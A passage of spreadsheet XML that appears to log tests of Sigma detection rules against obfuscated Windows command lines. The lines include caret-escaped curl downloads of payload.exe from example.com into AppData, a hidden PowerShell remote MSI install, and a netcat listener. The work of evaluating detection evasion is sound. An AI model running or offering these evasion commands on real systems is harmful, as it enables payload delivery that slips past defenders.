      <c r="H630" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I630" s="43" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J630" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K630" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B631" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C631" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D631" s="43" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E631" s="43" t="inlineStr">
        <is>
          <t>qemu-system-x86_64.exe -m 1M -netdev user,id=n1,restrict=off,connect=10.0.0.5:80 -nographic</t>
        </is>
      </c>
      <c r="F631" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G631" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H631" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I631" s="43" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J631" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K631" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B632" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C632" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D632" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E632" s="43" t="inlineStr">
        <is>
          <t>ncat.exe -l -v -p 4444</t>
        </is>
      </c>
      <c r="F632" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H632" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I632" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08); PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08)</t>
        </is>
      </c>
      <c r="J632" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K632" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B633" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C633" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D633" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E633" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F633" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G633" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H633" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I633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633" s="43" t="n"/>
      <c r="K633" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B634" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C634" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D634" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E634" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F634" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G634" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H634" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I634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634" s="43" t="n"/>
      <c r="K634" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B635" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C635" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D635" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E635" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F635" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G635" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H635" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I635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35" s="43" t="n"/>
      <c r="K635" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B636" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C636" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D636" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E636" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F636" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G636" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I636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36" s="43" t="n"/>
      <c r="K636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B637" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C637" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D637" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E637" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F637" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G637" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H637" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I637" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination (21dd6d38-2b18-4453-9404-a0fe4a0cc288); Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J637" s="43" t="n"/>
      <c r="K637" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B638" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C638" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D638" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E638" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F638" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G638" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H638" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I638" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination (21dd6d38-2b18-4453-9404-a0fe4a0cc288); Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J638" s="43" t="n"/>
      <c r="K638" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B639" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C639" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D639" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E639" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F639" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G639" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H639" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I639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639" s="43" t="n"/>
      <c r="K639" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B640" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C640" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D640" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E640" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F640" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G640" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H640" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I640" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Potential Commandline Obfuscation Using Escape Characters (f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J640" s="43" t="n"/>
      <c r="K640" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B641" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C641" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D641" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E641" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F641" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G641" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H641" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I641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1" s="43" t="n"/>
      <c r="K641" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B642" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C642" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D642" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E642" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F642" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G642" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H642" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I642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2" s="43" t="n"/>
      <c r="K642" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B643" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C643" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D643" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E643" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F643" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G643" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H643" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I643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3" s="43" t="n"/>
      <c r="K643" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B644" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C644" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D644" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E644" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F644" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G644" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H644" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I644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4" s="43" t="n"/>
      <c r="K644" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C645" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D645" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E645" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H645" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I645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(9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J645" s="43" t="n"/>
      <c r="K645" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B646" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C646" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D646" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E646" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F646" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G646" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H646" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I646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6" s="43" t="n"/>
      <c r="K646" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B647" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C647" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D647" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E647" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F647" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G647" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H647" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I647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7" s="43" t="n"/>
      <c r="K647" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B648" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C648" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D648" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E648" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F648" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G648" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H648" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I648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48" s="43" t="n"/>
      <c r="K648" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B649" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C649" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D649" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E649" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F649" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G649" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H649" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I649" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J649" s="43" t="n"/>
      <c r="K649" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B650" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C650" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D650" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E650" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F650" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G650" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H650" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I650" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J650" s="43" t="n"/>
      <c r="K650" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B651" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C651" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D651" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E651" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H651" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I651" s="43" t="n"/>
      <c r="J651" s="43" t="n"/>
      <c r="K651" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B652" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C652" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D652" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E652" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F652" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G652" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H652" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I652" s="43" t="n"/>
      <c r="J652" s="43" t="n"/>
      <c r="K652" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B653" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C653" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D653" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E653" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F653" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G653" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H653" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I653" s="43" t="n"/>
      <c r="J653" s="43" t="n"/>
      <c r="K653" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B654" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C654" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D654" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E654" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F654" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G654" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H654" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I654" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J654" s="43" t="n"/>
      <c r="K654" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B655" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C655" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D655" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E655" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F655" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G655" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H655" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I655" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
